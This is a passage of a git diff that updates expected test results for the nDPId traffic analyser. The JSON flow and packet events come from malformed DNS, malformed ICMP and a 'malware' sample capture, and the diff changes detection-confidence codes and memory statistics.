z8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\
/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8+Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz\/AQD0+Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/wEHAQjs8PT4\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/P8BDwETARcBGNzg5Ojs8PT4\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz\/AR8BIwEnASsBLwEzATcBOLzAxMjM0NTY3ODk6Ozw9Pj8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/wE\/AUMBRwFLAU8BUwFXAVsBXwFjAWcBawFvAXMBdwF4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9PsBfwGDAYcBiwGPAZMBlwGbAZ8BowGnAasBrwGzAbcBuwG\/AcMBxwHLAc8B0wHXAdsB3wHjAecB6wHvAfMB9wH4AAQABwAwAAQABAAAAAAAEQkJCQsAMAAUAAQAAAAAATANBQUE\/MDAwMDEwMDAyMDAxMTAwMTIwMDIxMDAyMjAxMDEwMjAxMTEwMTEyMDEyMTAxMjIwMjAyMTEwMjEyMDIyMTAyBQAAAAAAwP8="} 
-00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1591551760342,"flow_last_seen":1591551765368,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5608,"flow_avg_l4_payload_len":934,"midstream":0,"thread_ts_msec":1591551765368,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50435,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1591551760342,"flow_last_seen":1591551765368,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5608,"flow_avg_l4_payload_len":934,"midstream":0,"thread_ts_msec":1591551765368,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50435,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"malformed_dns.pcap","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":5608,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1591551765368} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6/6 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869664 bytes -~~ total memory freed........: 5869664 bytes -~~ total allocations/frees...: 118122/118122 +~~ total memory allocated....: 6003298 bytes +~~ total memory freed........: 6003298 bytes +~~ total allocations/frees...: 120884/120884 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 2655 chars diff --git a/test/results/malformed_icmp.pcap.out b/test/results/malformed_icmp.pcap.out index a73d12bcb..cdb9d1f97 100644 --- a/test/results/malformed_icmp.pcap.out +++ b/test/results/malformed_icmp.pcap.out 
@@ -2,8 +2,8 @@ 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"malformed_icmp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1593066612951} 00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"malformed_icmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593066612951,"flow_last_seen":1593066612951,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1593066612951,"l3_proto":"ip4","src_ip":"218.152.179.213","dst_ip":"218.152.179.54","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"malformed_icmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1593066612951,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":42,"pkt_l4_len":8,"thread_ts_msec":1593066612951,"pkt":"AFUir8Y3AERm\/CmvCABFAAAcAAEAAEABXqPamLPV2pizNqUAWv8AAAAA"} 
-00733{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"malformed_icmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593066612951,"flow_last_seen":1593066612951,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1593066612951,"l3_proto":"ip4","src_ip":"218.152.179.213","dst_ip":"218.152.179.54","l4_proto":"icmp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00772{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"malformed_icmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1593066612951,"flow_last_seen":1593066612951,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1593066612951,"l3_proto":"ip4","src_ip":"218.152.179.213","dst_ip":"218.152.179.54","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
+00733{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"malformed_icmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593066612951,"flow_last_seen":1593066612951,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1593066612951,"l3_proto":"ip4","src_ip":"218.152.179.213","dst_ip":"218.152.179.54","l4_proto":"icmp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00772{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"malformed_icmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1593066612951,"flow_last_seen":1593066612951,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1593066612951,"l3_proto":"ip4","src_ip":"218.152.179.213","dst_ip":"218.152.179.54","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"malformed_icmp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":8,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1593066612951} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869472 bytes -~~ total memory freed........: 5869472 bytes -~~ total allocations/frees...: 118115/118115 +~~ total memory allocated....: 6003106 bytes +~~ total memory freed........: 6003106 bytes +~~ total allocations/frees...: 120877/120877 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 443 chars ~~ json string max len.......: 777 chars diff --git a/test/results/malware.pcap.out b/test/results/malware.pcap.out index 50af853ad..24208dae9 100644 --- a/test/results/malware.pcap.out +++ b/test/results/malware.pcap.out 
@@ -2,32 +2,32 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"malware.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1569571466977} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571466977,"flow_last_seen":1569571466977,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569571466977,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569571466977,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1569571466977,"pkt":"CGoKOl4eMFLLbJwbCABFAABcg9cAAEARLQnAqAcHAQEBAaWCADUASMoKC6QBIAABAAAAAAABA3d3dw9pbnRlcm5ldGJhZGd1eXMDY29tAAABAAEAACkQAAAAAAAADAAKAAjrBFAObfGpig=="} 
-00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571466977,"flow_last_seen":1569571466977,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569571466977,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.internetbadguys.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571466977,"flow_last_seen":1569571466977,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569571466977,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.internetbadguys.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569571467001,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1569571467001,"pkt":"MFLLbJwbCGoKOl4eCABFAABgLqZAADcRSzYBAQEBwKgHBwA1pYIATEdsC6SBgAABAAEAAAABA3d3dw9pbnRlcm5ldGJhZGd1eXMDY29tAAABAAHADAABAAEAAAABAARD11zSAAApBawAAAAAAAA="} -00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569571466977,"flow_last_seen":1569571467001,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1569571467001,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.internetbadguys.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"67.215.92.210"}} +00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569571466977,"flow_last_seen":1569571467001,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1569571467001,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"www.internetbadguys.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"67.215.92.210"}} 00548{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569571470672,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569571470672,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1569571470672,"pkt":"CGoKOl4eMFLLbJwbCABFAABU4M1AAEABCcTAqAcHkIv33AgApMYAAQABjsKNXQAAAABuRAoAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569571470672,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.297900} 
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569571470672,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.297900} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569571476362,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569571476362,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569571476362,"pkt":"CGoKOl4eMFLLbJwbCABFAAA0sPtAAEAGObHAqAcHkIv33IOqAFCfbfb4AAAAAIAC+vBQPgAAAgQFtAEBBAIBAwMH"} 
00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":196,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":3,"total-active-flows":3,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1569579408876} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579408876,"flow_last_seen":1569579408876,"flow_idle_time":7580000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00891{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569579408876,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":383,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":383,"pkt_l4_len":349,"thread_ts_msec":1569579408876,"pkt":"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"} 
-00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579408876,"flow_last_seen":1569579408876,"flow_idle_time":7580000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OpenDNS","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.internetbadguys.com","url":"www.internetbadguys.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; rv:68.0) Gecko\/20100101 Firefox\/68.0"}} +00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579408876,"flow_last_seen":1569579408876,"flow_idle_time":7580000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OpenDNS","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.internetbadguys.com","url":"www.internetbadguys.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; rv:68.0) Gecko\/20100101 Firefox\/68.0"}} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1569579409087,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1569579409087,"pkt":"MFLLbJwbCGoKOl4eCABFAABUIjBAADgGuBtD11zSwKgHBwBQvQrrd8wJyb3V8FAYAO11CAAALDXKuXRPxt9F45TTtQ17T177PqBz\/8Tm+6YgbZe0R+XFq38BUlr3UR8MAAA="} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579416636,"flow_last_seen":1569579416636,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579416636,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1569579416636,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569579416636,"pkt":"CGoKOl4eMFLLbJwbCABFAAA0xe5AAEAGDH3AqAcHQ9dc0omkAbvdSlrrAAAAAIAC+vBofwAAAgQFtAEBBAIBAwMH"} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1569579416828,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569579416828,"pkt":"MFLLbJwbCGoKOl4eCABFAAA0AABAADgG2mtD11zSwKgHBwG7iaQdaco+3Upa7IASchDpWQAAAgQFtAEBBAIBAwMH"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1569579416828,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569579416828,"pkt":"CGoKOl4eMFLLbJwbCABFAAAoxe9AAEAGDIjAqAcHQ9dc0omkAbvdSlrsHWnKP1AQAfZocwAA"} 